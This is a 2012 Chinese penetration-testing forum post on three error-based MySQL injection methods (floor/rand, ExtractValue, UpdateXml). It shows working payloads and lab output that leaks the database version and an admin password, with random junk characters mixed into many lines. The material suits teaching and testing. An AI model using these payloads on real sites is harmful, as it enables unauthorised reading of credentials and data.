中国网络渗透测试联盟

标题: 关于Mysql注入过程中的三种报错方式 [打印本页]
作者: admin    时间: 2012-12-10 10:28
标题: 关于Mysql注入过程中的三种报错方式
放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。. e' \" M* u6 F, i( _3 r$ p
实际测试环境:7 c" Z5 Q5 B/ s4 n6 B6 F

2 ^9 X6 {: ^. T 8 P8 w  t. x- y# i& b% L6 v
mysql> show tables;7 H' r/ N% l9 D2 U
+----------------+
/ _. Z- B5 k' C! }9 Y6 N4 w5 Q| Tables_in_test |% E0 N8 Z, M/ c$ B: b
+----------------+* K3 H5 r9 ?( ^4 \. i2 A2 O: n
| admin          |3 Z" ~% x4 I" w* e. h# T, A
| article        |$ d* t1 s; M% C7 p
+----------------+
; w6 d5 F, a( P1 m& N' P  z * o0 d/ C% E6 K2 I
8 u! V* u! i6 g+ I7 D& j( j" t" k* I

7 @& ~, r; M$ K5 jmysql> describe admin;5 M; g# k  B" r0 `7 [9 {
+-------+------------------+------+-----+---------+----------------+
% @0 G- k/ h( S- W5 `| Field | Type             | Null | Key | Default | Extra          |: @% j# c3 Q3 h, ]
+-------+------------------+------+-----+---------+----------------+) f& n( X, m3 m2 J0 R) y6 S
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |. V6 E; o' e; X( }7 T2 _& y
| user  | varchar(50)      | NO   |     | NULL    |                |3 n7 @  F+ p$ E5 S! ]5 I; T
| pass  | varchar(50)      | NO   |     | NULL    |                |
! Z) _/ x7 v0 n9 b+-------+------------------+------+-----+---------+----------------+
" c* {( M$ w; Y2 u
/ O! \8 i9 Y* C  }# g . [  o5 |5 x" g: U0 V6 W

9 A: F; i" P" Q9 }4 B; X# amysql> describe article;  G3 c- o6 r. S& K% o
+---------+------------------+------+-----+---------+----------------+
. Z! z2 J& h. e5 g0 H| Field   | Type             | Null | Key | Default | Extra          |7 h( {8 I2 R2 @8 O7 J& U! \
+---------+------------------+------+-----+---------+----------------+
- Q- `1 D: Y1 m% S+ K4 A" [. r| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
  a- H# _, h' n0 r5 @2 d1 g) h% F| title   | varchar(50)      | NO   |     | NULL    |                |) T, g: B+ b5 S2 ^
| content | varchar(50)      | NO   |     | NULL    |                |
* v' \2 g6 b% V/ ]& M: y; ^, [" m+---------+------------------+------+-----+---------+----------------+" Z, t; @) l8 ]$ Z7 q0 K7 \
1、通过floor报错
" y4 Q! W, E3 J) V( f可以通过如下一些利用代码
+ w% K# ]8 L2 q+ X
. l* W- {) C% {* J5 D
$ K7 g' w/ w5 x, w8 Oand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
' i: c' ^, [' D% i) efrom information_schema.tables group by x)a);
% T+ b2 c: r/ D- w  ?" m8 r" U  J ' A- I% e; z4 l
1 {- }3 M, o) I0 K- l6 ~( e( u
and (select count(*) from (select 1 union select null union select !1)x
3 A( G# x; h4 ]' P! M! N3 \group by concat((select table_name from information_schema.tables limit 1),
; {4 q- k3 W3 |& p! C: kfloor(rand(0)*2)));' g  `. }" a2 ~0 u5 i2 j8 Y
举例如下:
3 q  Z& q% z( O; G首先进行正常查询:3 p3 e$ ^8 V  t% f" O, Z2 |

5 |3 U  {7 \  Kmysql> select * from article where id = 1;8 {% p, o* H( ~, O) m
+----+-------+---------+4 y' H" f3 C* Z+ e1 O
| id | title | content |
- y0 h! K4 [( n+----+-------+---------+* O' y+ i4 K2 Z5 z$ U
|  1 | test  | do it   |
1 C8 L  p/ O1 B3 K7 @+----+-------+---------+1 q- R/ W2 L- s$ V( x
假如id输入存在注入的话,可以通过如下语句进行报错。$ A/ F5 w# t0 `. U

' }- ~1 a/ f6 x9 O' y: a 6 W  ^; a- O' }. L
mysql> select * from article where id = 1 and (select 1 from2 p+ a- P/ z, q; N" y, b+ R1 N5 J
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);. O" j0 d+ J  w/ e+ U$ t5 e
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'1 L- m1 ]# X8 s$ O# X+ l0 V
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。- i4 ?$ O" e4 T* G
例如我们需要查询管理员用户名和密码:
8 ~$ V4 B  R$ _% H1 s" tMethod1:5 q% ?% Z5 f" b/ S- h
  K& W: S7 t. L3 ?% d# q
! H0 E) |0 |9 @3 R' q0 V4 i( r9 }( A
mysql> select * from article where id = 1 and (select 1 from! g3 @' a, Z& }
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x7 f& n4 S% a4 [, j* K- F" x: D
from information_schema.tables group by x)a);. a# @. x9 k7 f/ I+ Z' Z( U
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'3 L+ W9 b0 ]  {& N+ o
Method2:
& [% U3 E2 \) {. P8 [5 m
5 \" b' I  @0 f+ R
& ^2 I3 N1 r5 [( }- w3 O1 qmysql> select * from article where id = 1 and (select count(*)5 s0 ?, O) G; g. B8 D" _! z0 o$ P
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
, z3 K; _( R- w4 N! zfloor(rand(0)*2)));
) e1 s5 U) S! c! x2 I7 c2 N1 aERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'4 E& b( M; R: W7 f0 c7 H
2、ExtractValue
5 x( w' L1 t" X( c测试语句如下( g4 B$ M$ n# j

! T# d) Z  _. o* F; S/ d5 B 2 o" @8 h3 I( V/ {
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));) _6 a4 I8 A+ m8 ^/ K
实际测试过程2 O. }9 w7 h8 q" N% \) Z& M1 n

2 C3 X, N* p' _
1 L! D$ g4 r  _  j* g. j0 E$ Omysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,( r& E6 [4 k! `
(select pass from admin limit 1)));--6 I2 ]4 n  y( o& E
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
, ], q* N. }  Y* n4 c7 \# I3、UpdateXml3 H8 _5 H  ]# q: h1 b: B
测试语句" U  X! j; l; S0 ?5 y
1 S8 \- |/ M: V$ m
: x" o: s* f( F# p' ~# W
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
- P! g2 l$ h4 L3 m7 @6 Q实际测试过程0 \; f5 Q" u( X6 `4 i
) Q, ~( S1 M& s- b$ Z6 w' C
$ }/ W4 h9 A! A8 F$ M; n1 N  i
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
; j( B, \% _' ]) P$ h(select pass from admin limit 1),0x5e24),1));; X2 U! |: h; B$ T/ q0 S, D. `
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
- [$ l, H7 T% b3 F1 xAll, thanks foreign guys.
* O, V4 _% ~* C# G, v, M
  J6 t9 R7 p) \& {+ p5 F
' J0 x# B5 |0 w6 W1 u+ c2 `7 v



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2